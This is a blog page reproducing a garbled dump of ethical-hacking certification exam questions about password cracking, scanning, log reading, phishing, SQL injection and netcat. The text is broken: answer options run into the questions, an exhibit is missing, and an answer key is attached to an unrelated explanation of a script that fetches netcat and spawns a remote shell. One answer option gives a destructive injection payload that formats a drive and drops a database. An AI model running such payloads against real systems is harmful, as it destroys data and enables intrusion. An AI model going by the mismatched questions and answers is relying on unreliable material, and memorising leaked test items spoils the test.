Steven the hacker realizes that the network administrator of testking is using syskey to protect organization resources in the Windows 2000 Server. Syskey independently encrypts the hashes so that physical access to the server, tapes, or ERDs is only first step to cracking the passwords. Steven must break through the encryption used by syskey before he can attempt to brute force dictionary attacks on the hashes. Steven runs a program called 'SysCracker' targeting the Windows 2000 Server machine in attempting to crack the hash used by Syskey.
He needs to configure the encryption level before he can launch attach. How many bits does Syskey use for encryption? The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. From the options given below choose the one best interprets the following entry: Apr 26 06:43:05 6282 IDS181/nops-x86: 63.226.
172.16.1.107:53 (Note: The objective of this question is to test whether the student can read basic information from log entries and interpret the nature of attack.) Interpret the following entry: Apr 26 06:43:05 6283: IDS181/nops-x86: 63.226. 172.16.1.107.53 A. An IDS evasion technique B. A buffer overflow attempt C.
A DNS zone transfer D. Data being retrieved from 63.226.81.13. You are having problems while retrieving results after performing port scanning during internal testing. You verify that there are no security devices between you and the target system.
When both stealth and connect scanning do not work, you decide to perform a NULL scan with NMAP. The first few systems scanned shows all ports open. Which one of the following statements is probably true? The systems have all ports open. The systems are running a host based IDS. The systems are web servers.
The systems are running Windows. Bill has successfully executed a buffer overflow against a Windows IIS web server. He has been able to spawn an interactive shell and plans to deface the main web page.
He first attempts to use the 'Echo' command to simply overwrite index.html and remains unsuccessful. He then attempts to delete the page and achieves no progress. Finally, he tries to overwrite it with another page again in vain. What is the probable cause of Bill's problem? The system is a honeypot.
There is a problem with the shell and he needs to run the attack again. You cannot use a buffer overflow to deface a web page.
The HTML file has permissions of ready only. In the context of password security, a simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such as L0phtCrack or John the Ripper, and running it against user accounts located by the application. The larger the word and word fragment selection, the more effective the dictionary attack is. The brute force method is the most inclusive, although slow. It usually tries every possible letter and number combination in its automated exploration. If you would use both brute force and dictionary methods combined together to have variation of words, what would you call such an attack? Full Blown B.
Jim is having no luck performing a penetration test in testking's network. He is running the tests from home and has downloaded every security scanner that he could lay his hands on. Despite knowing the IP range of all the systems, and the exact network configuration, Jim is unable to get any useful results. Why is Jim having these problems? Security scanners are not designed to do testing through a firewall. Security scanners cannot perform vulnerability linkage. Security scanners are only as smart as their database and cannot find unpublished vulnerabilities.
All of the above. Scanning for services is an easy job for Bob as there are so many tools available from the Internet. In order for him to check the vulnerability of testking, he went through a few scanners that are currently available. Here are the scanners that he uses: 1. Axent's NetRecon (2.
SARA, by Advanced Research Organization (3. VLAD the Scanner, by Razor (However, there are many other alternative ways to make sure that the services that have been scanned will be more accurate and detailed for Bob. What would be the best method to accurately identify the services running on a victim host?
Using Cheops-ng to identify the devices of testking. Using the manual method of telnet to each of the open ports of testking.
Using a vulnerability scanner to try to probe each port to verify or figure out which service is running for testking. Using the default port and OS to make a best guess of what services are running on each port for testking.
What do you conclude from the nmap results below? Staring nmap V.
3.10ALPHA0 (www.insecure.org/map/) (The 1592 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 25/tcp open smtp 80/tcp open http 443/tcp open https Remote operating system guess: Too many signatures match the reliability guess the OS. Nmap run completed - 1 IP address (1 host up) scanned in 91.66 seconds A. The system is a Windows Domain Controller. The system is not firewalled. The system is not running Linux or Solaris.
The system is not properly patched. Clive has been monitoring his IDS and sees that there are a huge number of ICMP Echo Reply packets that are being received on the external gateway interface. Further inspection reveals that they are not responses from the internal hosts' requests but simply responses coming from the Internet. What could be the most likely cause?
Someone has spoofed Clive's IP address while doing a smurf attack. Someone has spoofed Clive's IP address while doing a land attack. Someone has spoofed Clive's IP address while doing a fraggle attack. Someone has spoofed Clive's IP address while doing a DoS attack. Snort has been used to capture packets on the network. On studying the packets, the penetration tester finds it to be abnormal. If you were the penetration tester, why would you find this abnormal?
05/20-17:34 192.160.13.4:31337 - 172.16.1.101:1 TCP TTL:44 TOS:0x10 ID:242. FRP. Seq: 0XA1D95 Ack: 0x53 Win: 0x400. 05/20-17:79 192.160.13.4:31337 - 172.16.1.101:1024 TCP TTL:44 TOS:0x10 ID:242.
FRP. Seg: 0XA1D95 Ack: 0x53 Win: 0x400 What is odd about this attack? (Choose the most appropriate statement) A. This is not a spoofed packet as the IP stack has increasing numbers for the three flags. This is back orifice activity as the scan comes from port 31337. The attacker wants to avoid creating a sub-carrier connection that is not normally valid. There packets were created by a tool; they were not created by a standard IP stack.
You are scanning into the target network for the first time. You find very few conventional ports open. When you attempt to perform traditional service identification by connecting to the open ports, it yields either unreliable or no results.
You are unsure of which protocols are being used. You need to discover as many different protocols as possible.
Which kind of scan would you use to achieve this? (Choose the best answer) A. Nessus scan with TCP based pings.
Nmap scan with the -sP (Ping scan) switch. Netcat scan with the -u -e switches. Nmap with the -sO (Raw IP packets) switch. A client has approached you with a penetration test requirements. They are concerned with the possibility of external threat, and have invested considerable resources in protecting their Internet exposure. However, their main concern is the possibility of an employee elevating his/her privileges and gaining access to information outside of their respective department.
What kind of penetration test would you recommend that would best address the client's concern? A Black Box test B. A Black Hat test C.
A Grey Box test D. A Grey Hat test E. A White Box test F. A White Hat test. Bob is acknowledged as a hacker of repute and is popular among visitors of 'underground' sites.
Bob is willing to share his knowledge with those who are willing to learn, and many have expressed their interest in learning from him. However, this knowledge has a risk associated with it, as it can be used for malevolent attacks as well. In this context, what would be the most effective method to bridge the knowledge gap between the 'black' hats or crackers and the 'white' hats or computer security professionals? (Choose the best answer) A. Educate everyone with books, articles and training on risk analysis, vulnerabilities and safeguards. Hire more computer security monitoring personnel to monitor computer systems and networks. Make obtaining either a computer security certification or accreditation easier to achieve so more individuals feel that they are a part of something larger than life.
Train more National Guard and reservist in the art of computer security to help out in times of emergency or crises. Peter extracts the SIDs list from Windows 2000 Server machine using the hacking tool 'SIDExtractor'. Here is the output of the SIDs: s-1-5-40-100Johns s-1-5-40-652Rebecca s-1-5-40-412Sheela s-1-5-40-999Shawn s-1-5-40-777Somia s-1-5-40-500chang s-1-5-40-555Micah From the above list identify the user account with System Administrator privileges. You receive an email with the following message: Hello Steve, We are having technical difficulty in restoring user database record after the recent blackout.
Your account data is corrupted. Please logon to the SuperEmailServices.com and change your password.
If you do not reset your password within 7 days, your account will be permanently disabled locking you out from our e-mail services. Sincerely, Technical Support SuperEmailServices From this e-mail you suspect that this message was sent by some hacker since you have been using their e-mail services for the last 2 years and they have never sent out an e-mail such as this. You also observe the URL in the message and confirm your suspicion about 0xde.0xad.0xbde.0xef which looks like hexadecimal numbers. You immediately enter the following at Windows 2000 command prompt: Ping 0xde.0xad.0xbe.0xef You get a response with a valid IP address.
What is the obstructed IP address in the e-mail URL? 222.173.190.239 B. 233.34.45.64 C. 54.23.56.55 D. An attacker is attempting to telnet into a corporation's system in the DMZ. The attacker doesn't want to get caught and is spoofing his IP address. After numerous tries he remains unsuccessful in connecting to the system.
The attacker rechecks that the target system is actually listening on Port 23 and he verifies it with both nmap and hping2. He is still unable to connect to the target system. What is the most probable reason?
The firewall is blocking port 23 to that system. He cannot spoof his IP and successfully use TCP. He needs to use an automated tool to telnet in. He is attacking an operating system that does not reply to telnet even when open. Jess the hacker runs L0phtCrack's built-in sniffer utility which grabs SMB password hashed and stored them for offline cracking.
Once cracked, these passwords can provide easy access to whatever network resources the user account has access to. But Jess is not picking up hashed from the network. The network protocol is configured to use SMB Signing. The physical network wire is on fibre optic cable. The network protocol is configured to use IPSEC. L0phtCrack SMB filtering only works through Switches and not Hubs. Exhibit:.
MISSING. You are conducting pen-test against a company's website using SQL Injection techniques. You enter 'anuthing or 1=1-' in the username filed of an authentication form. This is the output returned from the server. What is the next step you should do? Identify the user context of the web application by running AND USERNAME = 'dbo' B.
Identify the database and table name by running: AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1))) 109 C. Format the C: drive and delete the database by running: AND xpcmdshell 'format c: /q /yes '; drop database myDB; - D. Reboot the web server by running: AND xpcmdshell 'iisreset -reboot'.
In an attempt to secure his wireless network, Bob turns off broadcasting of the SSID. He concludes that since his access points require the client computer to have the proper SSID, it would prevent others from connecting to the wireless network. Unfortunately unauthorized users are still able to connect to the wireless network. Why do you think this is possible? Bob forgot to turn off DHCP. All access points are shipped with a default SSID. The SSID is still sent inside both client and AP packets.
Bob's solution only works in ad-hoc mode. In an attempt to secure his wireless network, Bob implements a VPN to cover the wireless communications. Immediately after the implementation, users begin complaining about how slow the wireless network is. After benchmarking the network's speed.
Bob discovers that throughput has dropped by almost half even though the number of users has remained the same. Why does this happen in the VPN over wireless implementation?
The stronger encryption used by the VPN slows down the network. Using a VPN with wireless doubles the overhead on an access point for all direct client to access point communications. VPNs use larger packets then wireless networks normally do. Using a VPN on wireless automatically enables WEP, which causes additional overhead.
Bob, and Administrator at testking was furious when he discovered that his buddy Trent, has launched a session hijack attack against his network, and sniffed on his communication, including administrative tasks suck as configuring routers, firewalls, IDS, via Telnet. Bob, being an unhappy administrator, seeks your help to assist him in ensuring that attackers such as Trent will not be able to launch a session hijack in testking. Based on the above scenario, please choose which would be your corrective measurement actions (Choose two) A. Use encrypted protocols, like those found in the OpenSSH suite. Implement FAT32 filesystem for faster indexing and improved performance. Configure the appropriate spoof rules on gateways (internal and external).
Monitor for CRP caches, by using IDS products. Answer: A The script being depicted is in perl (both msadc.pl and the script their using as a wrapper) - $port, $your, $user, $pass, $host are variables that hold the port # of a DNS server, an IP, username, and FTP password. $host is set to argument variable 0 (which means the string typed directly after the command). Essentially what happens is it connects to an FTP server and downloads nc.exe (the TCP/IP swiss-army knife - netcat) and uses nc to open a TCP port spawning cmd.exe (cmd.exe is the Win32 DOS shell on NT/2000/2003/XP), cmd.exe when spawned requires NO username or password and has the permissions of the username it is being executed as (probably guest in this instance, although it could be administrator). The #'s in the script means the text following is a comment, notice the last line in particular, if the # was removed the script would spawn a connection to itself, the host system it was running on. Neil monitors his firewall rules and log files closely on a regular basis. Some of the users have complained to Neil that there are a few employees who are visiting offensive web sites during work hours, without consideration for others.
Neil knows that he has an updated content filtering system and that such access should not be authorized. What type of technique might be used by these offenders to access the Internet without restriction? They are using UDP which is always authorized at the firewall. They are using tunneling software which allows them to communicate with protocols in a way it was not intended. They have been able to compromise the firewall, modify the rules, and give themselves proper access.
They are using an older version of Internet Explorer that allows them to bypass the proxy server. Bob has a good understanding of cryptography, having worked with it for many years.
Cryptography is used to secure data from specific threat, but it does not secure the application from coding errors. It can provide data privacy, integrity and enable strong authentication but it cannot mitigate programming errors. What is a good example of a programming error that Bob can use to illustrate to the management that encryption will not address all of their security concerns? Bob can explain that a random generator can be used to derive cryptographic keys but it uses a weak seed value and it is a form of programming error.
![]()
Bob can explain that by using passwords to derive cryptographic keys it is a form of a programming error. Bob can explain that a buffer overrun is an example of programming error and it is a common mistake associated with poor programming technique. Bob can explain that by using a weak key management technique it is a form of programming error. John is a keen administrator, had has followed all of the best practices as he could find on securing his Windows Server. He has renamed the Administrator account to a new name that he is sure cannot be easily guessed. However, there people who attempt to compromise his newly renamed administrator account. How is it possible for a remote attacker to decipher the name of the administrator account if it has been renamed?
The attacker used the user2sid program. The attacker used the sid2user program. The attacker used nmap with the -V switch.
The attacker guessed the new name. An attacker runs netcat tool to transfer a secret file between two hosts. Machine A: netcat -1 -p 1234 1234 He is worried about information being sniffed on the network. How would the attacker use netcat to encrypt information before transmitting it on the wire? Machine A: netcat -1 -p -s password 1234 1234 B. Machine A: netcat -1 -e magickey -p 1234 1234 C. Machine A: netcat -1 -p 1234 1234 -pw password D.
Use cryptcat instead of netcat. You are conducting a port scan on a subnet that has ICMP blocked. You have discovered 23 live systems and after scanning each of them you notice that they all show port 21 in closed state.
What should be the next logical step that should be performed? Connect to open ports to discover applications.
Perform a ping sweep to identify any additional systems that might be up. Perform a SYN scan on port 21 to identify any additional systems that might be up. Rescan every computer to verify the results. Bob has been hired to perform a penetration test on testking.net. He begins by looking at IP address ranges owned by the company and details of domain name registration. He then goes to News Groups and financial web sites to see if they are leaking any sensitive information of have any technical details online. Within the context of penetration testing methodology, what phase is Bob involved with?
Passive information gathering B. Active information gathering C.
Attack phase D. Vulnerability Mapping.
Comments are closed.
|
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |